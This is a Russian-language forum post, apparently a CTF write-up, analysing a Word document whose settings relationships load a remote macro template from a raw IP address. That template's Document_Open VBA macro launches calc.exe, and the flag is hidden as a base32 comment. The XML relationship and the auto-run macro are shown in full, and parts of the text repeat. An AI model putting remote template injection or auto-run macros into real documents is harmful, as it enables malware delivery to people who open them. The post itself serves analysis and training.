M4x
Green Team
- 20.05.2024
- 23
- 52
Дан вордовский документ Dark_sample.docx. Открываю в LibreOffice Writer, смотрю содержимое – ничего интересного. Решаю разархивировать docx'ник и посмотреть, что там реально лежит под капотом. Почти сразу натыкаюсь на странную ссылку в word/_rels/settings.xml.rels:
Иду по ссылке, скачиваю документ и затем открываю. LibreOffice Writer сразу выдает предупреждение:
Интересно. Лезу в макросы смотреть что там:
Интересно, что макрос запускает calc.exe (калькулятор) — классическая proof-of-concept демонстрация выполнения кода. Но настоящий флаг спрятан в комментарии выше, по-видимому, замаскированный под случайный идентификатор.
Строка "INHUIRKCLF5UMQKLIVPUMTCBI56QU===" выглядит как base32 из-за характерного набора символов (A-Z, 2-7).
Декодирую строку и получаю флаг.
P.S. Размещение строки в base32 в том виде, как она представлена в документе, равносильно публикации флага. В связи с этим, строка была заменена на фейковый флаг.
Код:
<Relationships>
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="http://62.173.140.174:11100/sample_doc.dotm" TargetMode="External"/>
</Relationships>Иду по ссылке, скачиваю документ и затем открываю. LibreOffice Writer сразу выдает предупреждение:
Macros in this document are disabled due to the Macro Security settings.Интересно. Лезу в макросы смотреть что там:
Код:
Rem Attribute VBA_ModuleType=VBAModule
Option VBASupport 1
Sub Document_Open()
' INHUIRKCLF5UMQKLIVPUMTCBI56QU===
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "calc.exe"
End SubИнтересно, что макрос запускает calc.exe (калькулятор) — классическая proof-of-concept демонстрация выполнения кода. Но настоящий флаг спрятан в комментарии выше, по-видимому, замаскированный под случайный идентификатор.
Строка "INHUIRKCLF5UMQKLIVPUMTCBI56QU===" выглядит как base32 из-за характерного набора символов (A-Z, 2-7).
Декодирую строку и получаю флаг.
Bash:
echo -n "INHUIRKCLF5UMQKLIVPUMTCBI56QU==="|base32 -dP.S. Размещение строки в base32 в том виде, как она представлена в документе, равносильно публикации флага. В связи с этим, строка была заменена на фейковый флаг.
Последнее редактирование:
